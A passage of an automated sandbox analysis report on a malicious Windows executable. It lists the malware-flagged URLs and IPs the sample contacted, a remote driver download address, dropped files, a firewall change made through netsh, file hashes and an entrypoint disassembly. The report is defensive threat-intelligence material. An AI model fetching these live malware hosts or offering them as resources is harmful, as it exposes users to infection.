                    http://ramoo.w8w.pl/mainh.gifLisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://lpbmx.ru/logos.gifLisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://lpbmx.ru/logos.gif?722bd8=7482328LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.000000000051E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.klkjwre9fqwieluoi.info/abp470n5.sysGetSystemDirectoryAdriversLisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gifLisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://jrsx.jre.net.cn/logos.gifLisectAVT_2403002B_38.exe, LisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://lpbmx.ru/logos.gif?722bd8=74823287h)LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://jrsx.jre.net.cn/logos.gif?723619=74849530CELisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://kukutrustnet777888.info/LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    https://www.otzywy.com/?76caf3=7785203ELisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://steamboy.h17.ru/mainf.gif?76caf3=7785203jLisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.otzywy.com/LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://89.119.67.154/testo5/LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.0000000002312000.00000040.00001000.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://lpbmx.ru/logos.gifhttp://macedonia.my1.ru/mainh.gifhttp://jrsx.jre.net.cn/logos.gifhttp://steLisectAVT_2403002B_38.exe, 00000000.00000003.1445581749.00000000005BB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022D8000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519540120.00000000022DE000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1521616058.00000000050CB000.00000004.00000010.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000003.1445124876.0000000000553000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1519273821.0000000000930000.00000004.10000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.otzywy.com/onia.my1.ru/mainh.gif?7231d3=37419295LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.otzywy.com/?76caf3=7785203om/?76caf3=7785203LisectAVT_2403002B_38.exe, 00000000.00000002.1522795877.0000000006900000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://jrsx.jre.net.cn/logos.gif?723619=74849530LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.00000000005D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000540000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://steamboy.h17.ru/ULisectAVT_2403002B_38.exe, 00000000.00000002.1518699969.0000000000601000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      81.190.94.112
                      		unknownPoland
                      		21021MULTIMEDIA-ASCableDTVInternetVoiceProviderinPolandfalse
                      195.201.126.132
                      		otzywy.comGermany
                      		24940HETZNER-ASDEfalse
                      201.45.100.171
                      		unknownBrazil
                      		4230CLAROSABRfalse
                      80.69.51.98
                      		unknownAzerbaijan
                      		34170AS-AZTELEKOMAzerbaijanTelecomunicationISPAZfalse
                      189.68.58.176
                      		unknownBrazil
                      		27699TELEFONICABRASILSABRfalse
                      94.76.206.216
                      		unknownUnited Kingdom
                      		29550SIMPLYTRANSITGBfalse
                      107.172.18.180
                      		steamboy.h17.ruUnited States
                      		36352AS-COLOCROSSINGUSfalse
                      77.39.42.64
                      		unknownRussian Federation
                      		12683STATEL-ASStavropolbranchofRostelecomRUfalse
                      81.10.9.50
                      		unknownEgypt
                      		8452TE-ASTE-ASEGfalse
                      77.122.85.173
                      		unknownUkraine
                      		25229VOLIA-ASUAfalse
                      217.70.126.141
                      		unknownRussian Federation
                      		16054NSOELSV-ASNovosibirskRussiaRUfalse
                      193.109.247.16
                      		macedonia.my1.ruVirgin Islands (BRITISH)
                      		204343COMPUBYTE-ASRUfalse
                      94.76.218.18
                      		unknownUnited Kingdom
                      		29550SIMPLYTRANSITGBfalse
                      94.50.7.74
                      		unknownRussian Federation
                      		12389ROSTELECOM-ASRUfalse

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1481739
                      Start date and time:2024-07-25 13:44:00 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 45s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:3
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:LisectAVT_2403002B_38.exe
                      Detection:MAL
                      Classification:mal100.spre.evad.winEXE@4/4@5/14
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 48
                      • Number of non-executed functions: 113
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.190.159.73, 20.190.159.64, 20.190.159.71, 20.190.159.68, 40.126.31.73, 40.126.31.67, 20.190.159.75, 20.190.159.2
                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtSetValueKey calls found.
                      • VT rate limit hit for: LisectAVT_2403002B_38.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      07:45:00API Interceptor13x Sleep call for process: LisectAVT_2403002B_38.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      94.76.218.18KeyPanel.exeGet hashmaliciousSalityBrowse
                        pkmo.exeGet hashmaliciousUnknownBrowse

                          Domains

                          No context

                          ASNs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLAROSABRphish_alert_sp2_2.0.0.0(4).emlGet hashmaliciousHTMLPhisherBrowse
                          • 2.17.100.210
                          LisectAVT_2403002C_62.dllGet hashmaliciousEmotetBrowse
                          • 201.75.62.86
                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                          • 200.174.198.86
                          Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                          • 200.174.198.86
                          94.156.8.9-skid.sh4-2024-07-23T17_40_06.elfGet hashmaliciousMirai, MoobotBrowse
                          • 177.64.217.240
                          wAO7F8FbEz.elfGet hashmaliciousUnknownBrowse
                          • 189.86.165.235
                          0GJSC4Ua2K.elfGet hashmaliciousUnknownBrowse
                          • 177.59.11.94
                          BJu5gH74uD.elfGet hashmaliciousUnknownBrowse
                          • 200.178.5.212
                          3B4ehVz4C4.elfGet hashmaliciousMiraiBrowse
                          • 179.208.175.208
                          PoksxEQkb8.elfGet hashmaliciousUnknownBrowse
                          • 200.191.29.200
                          MULTIMEDIA-ASCableDTVInternetVoiceProviderinPoland1gx339YsKN.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                          • 84.38.82.15
                          l5EsscvvPL.elfGet hashmaliciousMiraiBrowse
                          • 81.190.245.11
                          ikFn0h3xhF.elfGet hashmaliciousMiraiBrowse
                          • 85.117.3.203
                          2T9ShVKj85.elfGet hashmaliciousMiraiBrowse
                          • 81.190.221.71
                          Xe3eO9R1Ra.elfGet hashmaliciousMiraiBrowse
                          • 87.116.196.179
                          N5fJpUN6DR.elfGet hashmaliciousMiraiBrowse
                          • 89.230.211.104
                          GK9sEyIS4f.elfGet hashmaliciousMiraiBrowse
                          • 87.116.196.124
                          4VKc1Xzicz.elfGet hashmaliciousMiraiBrowse
                          • 89.229.254.71
                          jew.mpsl.elfGet hashmaliciousUnknownBrowse
                          • 37.190.169.138
                          jdsfl.x86.elfGet hashmaliciousMiraiBrowse
                          • 89.230.211.128
                          HETZNER-ASDELisectAVT_2403002B_48.exeGet hashmaliciousBdaejec, BlackMoonBrowse
                          • 88.198.117.174
                          LisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                          • 116.203.169.153
                          LisectAVT_2403002B_486.exeGet hashmaliciousRedLineBrowse
                          • 135.181.235.186
                          LisectAVT_2403002B_51.exeGet hashmaliciousUnknownBrowse
                          • 116.203.169.153
                          LisectAVT_2403002B_55.exeGet hashmaliciousXmrigBrowse
                          • 5.75.158.61
                          LisectAVT_2403002B_59.dllGet hashmaliciousEmotetBrowse
                          • 78.47.204.80
                          LisectAVT_2403002C_119.exeGet hashmaliciousBdaejec, SodinokibiBrowse
                          • 159.69.118.212
                          Bootstrapper.exeGet hashmaliciousHancitor, VidarBrowse
                          • 95.217.240.177
                          LisectAVT_2403002C_47.exeGet hashmaliciousSmokeLoaderBrowse
                          • 188.40.141.211
                          LisectAVT_2403002C_60.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                          • 128.140.125.116
                          AS-AZTELEKOMAzerbaijanTelecomunicationISPAZt4wCexrzVN.dllGet hashmaliciousWannacryBrowse
                          • 212.47.134.196
                          miraint.sh4Get hashmaliciousMiraiBrowse
                          • 158.181.37.74
                          Dsiuf7Hoq9Get hashmaliciousMiraiBrowse
                          • 80.69.53.205

                          JA3 Fingerprints

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          37f463bf4616ecd445d4a1937da06e19Setup#U540d#U5f55.exeGet hashmaliciousUnknownBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_401.exeGet hashmaliciousCryptOneBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_429.exeGet hashmaliciousBdaejecBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_437.exeGet hashmaliciousCryptOneBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_463.exeGet hashmaliciousBdaejecBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_458.exeGet hashmaliciousUnknownBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_463.exeGet hashmaliciousBdaejecBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_480.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                          • 195.201.126.132
                          LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                          • 195.201.126.132

                          Dropped Files

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          C:\Users\user\AppData\Local\Temp\ipyr.exem7q7gcniEz.exeGet hashmaliciousUnknownBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\ipyr.exe

                            Download File
                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):165888
                            Entropy (8bit):6.6980821797813785
                            Encrypted:false
                            SSDEEP:3072:GLLvkpY5SnMwbv5RkorwMLuflibzL/cNArhCAEf7ngKpIcXNokJrzOxEPcZA8TJa:E6USNVRkIHXO7RN/1y6PcOwej/Hv
                            MD5:E92D3A824A0578A50D2DD81B5060145F
                            SHA1:50EF7C645FD5CBB95D50FBADDF6213800F9296EC
                            SHA-256:87F53BC444C05230CE439DBB127C03F2E374067D6FB08E91C834371FD9ECF661
                            SHA-512:40D0AC6FA5A424B099923FCDB465E9A2F44569AF1C75CF05323315A8720517316A7E8627BE248CFF3A83382FB6DB1CF026161F627A39BC1908E63F67A34C0FD5
                            Malicious:false
                            Joe Sandbox View:
                            • Filename: m7q7gcniEz.exe, Detection: malicious, Browse
                            Reputation:low
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zt..>..>..>..7m|....*~.2..*~.;..*~.7..>..i..*~.#..*~....*~..?..*~..?..*~.?..Rich>..........................PE..L....$...................$...v......`........@....@.................................4.....@.................................|d..................................($...O..T...........................`................`..x...H........................text....#.......$.................. ..`.data...t....@.......(..............@....idata..N!...`..."...2..............@..@.didat...............T..............@....rsrc................V..............@..@.reloc..($.......&...b..............@..B................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\winhxrci.exe

                            Download File
                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                            File Type:data
                            Category:modified
                            Size (bytes):7274
                            Entropy (8bit):7.971631014666999
                            Encrypted:false
                            SSDEEP:192:GdYdRxL4HxJCbosHPgRpB0G75LJG1DtnymZv:GdDH+ELpBNw3ymZv
                            MD5:E07D7D3EA3ED643F30CFAA2B1F27F792
                            SHA1:763ADAE7507D5D696D5877509C8C0CEA9F250720
                            SHA-256:867E4891F2E6F55E75D5A621D5A50C10F8AC802FCC3834CCA3F9EE701DA7E0C1
                            SHA-512:F63A1DE8895CD6B64A4DCE4E16BE58DE9D07265871EFF176197A25BD7313BDD6AA7AD1C88AFAD932C9E961089B96DA38C70B9CC30EF0EA614F0E6D15E9A492B4
                            Malicious:false
                            Reputation:low
                            Preview:.M.4..{.}.!.y.....V..V.tdL }.....v..0...p..Uq1>.E$W1.....Z+...C..UW2!).."'.%.F...q..D.$.SiB..-.j.2'..q....g..,..L%..~..h#...hs..F.A.....z..Z.8? .i..~.M..0../...D.".a.U.>...A..U6..wde1..>.,.H#............_.eet.Z.....`...4.A.:.{...H...b...#s..{....W<H...'...d..b/.CS...mIw......M.=..=..i...h(...R..45W.,..A..L...).|J.....k4.j..{)1....T.{h.......^MNb..Fr...v..n..xrV......z-9.D}....>..$.s...U......rD...K.W...{P.k.....M..A..9..>_.M-...Bl..a-C..Y......H.1r.Z>p....L.E.). ....4.,.~.4.SF\D..n...............).....XW.z.q...>.....Jh.`+...:...W)g..E.`...p.H.b{..=@....jzm..C..T.xV(..d?d.Y.#$.....K.S..o....9!... .vYioJ.,....r.O..,....K...i9...... )\.T.....S..V..Q.~......U..e...;P....DyL...j..d...z......{q=.._.......2.T..1.^...@ywO..`.y..M..g4...I.s..u......R...%3..d..>=...(.:.p....8.^..1....9.z&.hG..t0.....o..L.mH0..[..F.."..Ri.-...Cw.[Y......k`;?.E..2w.u.sm...5...[.B.'...k.....g.)..e..'..QRIb.f.VP.H_!..qz<H.$...z.sP.4....5E|.p.s...)....h..i ............c.+.b.pY

                            C:\Windows\system.ini

                            Download File
                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_38.exe
                            File Type:Windows SYSTEM.INI
                            Category:dropped
                            Size (bytes):255
                            Entropy (8bit):5.27326679734616
                            Encrypted:false
                            SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtP1yL:F4Yv7yk3OUBq82wqFtP1yL
                            MD5:A7AF9B0AFC81CEA829CCEF0A25ACC619
                            SHA1:39BDBDEC485CBAB40E4A24C641AC5350C2555147
                            SHA-256:2F899673F34C2B0640CAB1E22FBA1B73DE6E3C8FFC5204431660D7CA29FC0364
                            SHA-512:22B5156AA75692BD870E3A2A202A1925A007CB9523B916DECCE392269395C498CC04C5919BBC9AFDA4508294CD328065AB6C4EE8D5F488C5055DA0CD7634689D
                            Malicious:false
                            Reputation:low
                            Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=66797654685..

                            \Device\ConDrv

                            Download File
                            Process:C:\Windows\SysWOW64\netsh.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):313
                            Entropy (8bit):4.971939296804078
                            Encrypted:false
                            SSDEEP:6:/ojfKsUTGN8Ypox42k9L+DbGMKeQE+vigqAZs2E+AYeDPO+Yswyha:wjPIGNrkHk9iaeIM6ADDPOHyha
                            MD5:689E2126A85BF55121488295EE068FA1
                            SHA1:09BAAA253A49D80C18326DFBCA106551EBF22DD6
                            SHA-256:D968A966EF474068E41256321F77807A042F1965744633D37A203A705662EC25
                            SHA-512:C3736A8FC7E6573FA1B26FE6A901C05EE85C55A4A276F8F569D9EADC9A58BEC507D1BB90DBF9EA62AE79A6783178C69304187D6B90441D82E46F5F56172B5C5C
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..IMPORTANT: Command executed successfully...However, "netsh firewall" is deprecated;..use "netsh advfirewall firewall" instead...For more information on using "netsh advfirewall firewall" commands..instead of "netsh firewall", see KB article 947709..at https://go.microsoft.com/fwlink/?linkid=121488 .....Ok.....

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.647042202071686
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.53%
                            • InstallShield setup (43055/19) 0.43%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:LisectAVT_2403002B_38.exe
                            File size:563'744 bytes
                            MD5:dcd409fa904f30ab580781337fb866b7
                            SHA1:e377b6810bb20b46ec0ce24020a58dfec7f94b18
                            SHA256:2cca553e01de4f4ba2f5eaa1b0b1bc8bfbaee289d7b95dbdb3d6e0d67cd9c7fd
                            SHA512:000686649dc4b9ff86ec29213b09cd28ce405fd28d1886110166d1b82aa1e2f760c9acb3fbc10dd793d986151cb4a75f222fe4bf7e4d83302087e414aa23416a
                            SSDEEP:6144:aQbQA4BEMTpzHq1KZe75Q3QbpkcuxgrLQxPS5LjYQuuXVCCk/j+lTsAJmfDe+Bui:HQDFKFAe7YYsFV4qR
                            TLSH:B8C43B70F6EAC9A6F1F3BB30A9745A6409B3BEE6AF74804F364C748D4A717809434752
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7Q..dQ..dQ..dvX.dD..d.Z.dP..dvX.d,..d...dR..d...dD..dQ..d...dvX.dj..dvX.dP..dvX.dP..dRichQ..d........................PE..L..

                            File Icon

                            Icon Hash:0e071313c6baf817

                            Static PE Info

                            General

                            Entrypoint:0x40e2c8
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:
                            Time Stamp:0x4A8DA167 [Thu Aug 20 19:17:59 2009 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:00820213dca84d93f40ffdf514a6b4dc

                            Authenticode Signature

                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:

                                Entrypoint Preview

                                Instruction
                                pushad
                                push 00000056h
                                call 00007F6348E5753Eh
                                pop ecx
                                sub edx, 000020B6h
                                xor ebx, ecx
                                mov ecx, 990EE7F4h
                                mov al, dh
                                rcl esi, FFFFFFE5h
                                jmp 00007F6348E572F3h
                                mov ch, 68h
                                sub al, BFh
                                jbe 00007F6348E572F6h
                                push 00000042h
                                call 00007F6348E57586h
                                pop ecx
                                pop ebx
                                call 00007F6348E5731Dh
                                xchg eax, edx
                                adc esi, edx
                                pusha
                                lodsb
                                mov al, byte ptr [2FD1D588h]
                                js 00007F6348E5734Bh
                                or dword ptr [esi-7Dh], 42CC894Ah
                                leave
                                jmp 00007F62D549B68Ah
                                mov bh, 8Dh
                                lodsb
                                out 63h, eax
                                and ebp, dword ptr [ebx-64h]
                                add eax, A416345Eh
                                push 0000000Ch
                                call 00007F6348E5793Dh
                                pop ecx
                                push 00000074h
                                push FFFFFFF1h
                                and eax, 00000000h
                                push eax
                                call dword ptr [0041B158h]
                                pop edx
                                pop edx
                                sub ebp, esi
                                rcl esi, 1
                                shrd ebp, edi, cl
                                push 029A9A2Fh
                                push 1B86F03Ah
                                call 00007F6348E57528h
                                pop ebx
                                pop eax
                                pop edx
                                cmp eax, esi
                                shld ebx, edx, cl
                                not ebx
                                movzx ebx, cx
                                movzx ebx, cx
                                jne 00007F6348E572FEh
                                sub eax, ebx
                                bsf ebx, edx
                                shld ebx, edx, 00000080h
                                xor ebx, ecx
                                add edx, 023B5F96h
                                cmp al, dh
                                rcl ecx, 1
                                adc ecx, ebp
                                rcl ecx, 5Ch
                                sub edx, 0234928Fh
                                test ebx, 71C6FFECh
                                test ch, dl
                                imul edi, esi, 00009F0Ch

                                Rich Headers

                                Programming Language:
                                • [ASM] VS2005 build 50727
                                • [ C ] VS2005 build 50727
                                • [C++] VS2005 build 50727
                                • [RES] VS2005 build 50727
                                • [LNK] VS2005 build 50727

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2376c0xdc.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x4dabc.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x750000x1a20.rsrc
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x22e600x40.rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x1b0000x3a4.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x19f290x1a000b4659923aa4571b286be3e5bef658877False0.590576171875data6.602995608020341IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rdata0x1b0000x9ce40xa0009c7180d927b32939ed8e3064f9b5660aFalse0.3497314453125data5.508291628702278IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .data0x250000x79a80x200098b7e1246bc229baafca12b1925d036eFalse0.1470947265625data2.290726643091353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x2d0000x4dabc0x4e000581c313968042a18aa2db4fc8b053636False0.24480418669871795data5.8282045153546065IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .ardata0x7b0000x130000x13000a0e8a7e8dc948977a8e4b61ef4c4dee8False0.9961708470394737data7.994014875588453IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                Resources

                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_BITMAP0x2df100x2b266Device independent bitmap graphic, 488 x 360 x 8, image size 175682, resolution 2834 x 2834 px/m, 255 important colorsArabicSaudi Arabia0.23287051181948829
